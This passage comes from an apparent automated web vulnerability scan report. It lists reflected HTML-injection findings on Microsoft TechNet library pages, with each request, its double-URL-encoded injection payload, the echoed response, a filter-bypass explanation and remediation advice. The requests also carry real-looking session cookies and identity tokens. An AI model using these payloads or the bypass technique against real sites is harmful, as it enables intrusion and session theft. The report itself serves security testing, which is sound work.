17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb625087.aspxda43a"><a>f735b7a07d3" />
...[SNIP]...

2.160. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7577%2522%253e%253ca%253eacf3b7933c9 was submitted in the REST URL parameter 1. This input was echoed as d7577"><a>acf3b7933c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd7577%2522%253e%253ca%253eacf3b7933c9/library/bb726976.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7577"><a>acf3b7933c9/library/bb726976" />
...[SNIP]...

2.161. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828a9%2522%253e%253ca%253eb8ea94052da was submitted in the REST URL parameter 2. This input was echoed as 828a9"><a>b8ea94052da in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library828a9%2522%253e%253ca%253eb8ea94052da/bb726976.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library828a9"><a>b8ea94052da/bb726976" />
...[SNIP]...

2.162. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdec4%2522%253e%253ca%253e9c59d07c487 was submitted in the REST URL parameter 3. This input was echoed as fdec4"><a>9c59d07c487 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726976.aspxfdec4%2522%253e%253ca%253e9c59d07c487 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726976.aspxfdec4"><a>9c59d07c487" />
...[SNIP]...

2.163. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79%2522%253e%253ca%253e6e48a9d51bc was submitted in the REST URL parameter 1. This input was echoed as d7b79"><a>6e48a9d51bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd7b79%2522%253e%253ca%253e6e48a9d51bc/library/bb727024.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7b79"><a>6e48a9d51bc/library/bb727024" />
...[SNIP]...

2.164. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d263%2522%253e%253ca%253eefc03635f13 was submitted in the REST URL parameter 2. This input was echoed as 2d263"><a>efc03635f13 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library2d263%2522%253e%253ca%253eefc03635f13/bb727024.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; 